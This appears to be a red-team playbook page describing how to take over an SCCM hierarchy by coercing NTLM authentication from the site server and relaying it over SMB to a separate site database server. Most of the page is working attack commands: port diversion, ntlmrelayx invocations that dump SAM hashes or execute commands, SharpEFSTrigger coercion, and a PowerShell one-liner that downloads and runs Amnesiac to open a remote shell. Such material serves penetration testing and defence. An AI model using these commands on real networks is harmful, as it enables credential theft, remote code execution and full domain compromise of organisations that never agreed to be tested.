Document Reference


Hierarchy takeover via NTLM coercion and relay to SMB on remote site database


  • PKI certificates are not required for client authentication (default)

  • SCCM database server hosted on a system that is independent of the main site server

  • SMB is reachable and SMB signing isn’t required on the site database server

  • Local Administrator if performing the attack from Windows (due to SMB port redirect)

Tools Required


Divert SMB on port 445 to port 8445 (Requires Local Administrator)

divertTCPconn.exe 445 8445

Set up ntlmrelayx to the alternate SMB port and to point at the MSSQL database server

# Dump SAM
ntlmrelayx.exe --smb-port 8445 -smb2support -t <MSSQL SSCM IP>

# Execute Commands
ntlmrelayx.exe --smb-port 8445 -smb2support -t -c "[Command]"

Perform the coercerian with SharpEFSTrigger to relay the SCCM Site Server computer account to the MSSQL database server.

SharpEFSTrigger.exe <Site Server IP> <Listener IP>

Getting a full shell on Windows with Amnesiac

Load Amnesiac through PowerShell

iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/Leo4j/Amnesiac/main/Amnesiac.ps1');Amnesiac

Generate a global listener payload with option [2]

Use the payload within ntlmrelayx to be executed on the target system.

# Setup with ntlmrelayx
ntlmrelayx.exe -t -smb2support --smb-port 8445 -c "[PAYLOAD]"

Once we trigger coercion again, ntlmrelayx will execute the powershell payload on the target system. Once this is done, use option [3] on Amnesiac to connect.

Defensive IDs

Last updated